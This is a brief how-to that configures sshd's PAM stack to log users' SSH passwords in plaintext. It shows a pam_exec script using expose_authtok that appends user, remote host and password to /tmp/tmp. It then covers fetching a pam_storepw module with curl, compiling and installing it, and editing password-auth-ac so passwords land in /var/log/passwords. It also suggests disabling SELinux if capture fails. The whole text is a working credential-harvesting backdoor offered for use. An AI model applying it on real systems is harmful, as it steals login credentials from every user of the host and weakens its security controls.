sshd save password

pam_exec.so

/etc/pam.d/password-auth-ac

#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth        required      pam_env.so
auth        sufficient    pam_unix.so nullok try_first_pass
auth        optional      pam_exec.so expose_authtok /usr/local/bin/pam_exec.so
auth        [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...

/usr/local/bin/pam_exec.so

#!/bin/sh
read password
echo "User: $PAM_USER" >> /tmp/tmp
echo "Ruser: $PAM_RUSER" >> /tmp/tmp
echo "Rhost: $PAM_RHOST" >> /tmp/tmp
echo "Service: $PAM_SERVICE" >> /tmp/tmp
echo "TTY: $PAM_TTY" >> /tmp/tmp
echo "Password : $password" >> /tmp/tmp
exit $?

pam_storepw.so

Download source code for module.

curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c

Create the following Makefile

all: pam_storepw.so

pam_storepw.so: pam_storepw.o
	$(LD) --shared -o $@ $< -lpam -lpam_misc

clean:
       rm -f pam_storepw.o pam_storepw.so core *~

extraclean: clean
       rm -f *.a *.o *.so *.bak

.c.o:
       $(CC) $(CFLAGS) -c $< -o $@ -fPIC

Build file

make

Copy file

cp pam_storepw.so /lib64/security/
chmod 755 /lib64/security/pam_storepw.so

password-auth-ac

#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth        required      pam_env.so
auth        sufficient    pam_unix.so nullok try_first_pass
auth        optional      pam_storepw.so
auth        [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...

Passwords start to be written to

/var/log/passwords

If you do not get any entries.

Temporarily turn selinux off to see if it starts to work
run pam in debug to see what is going on.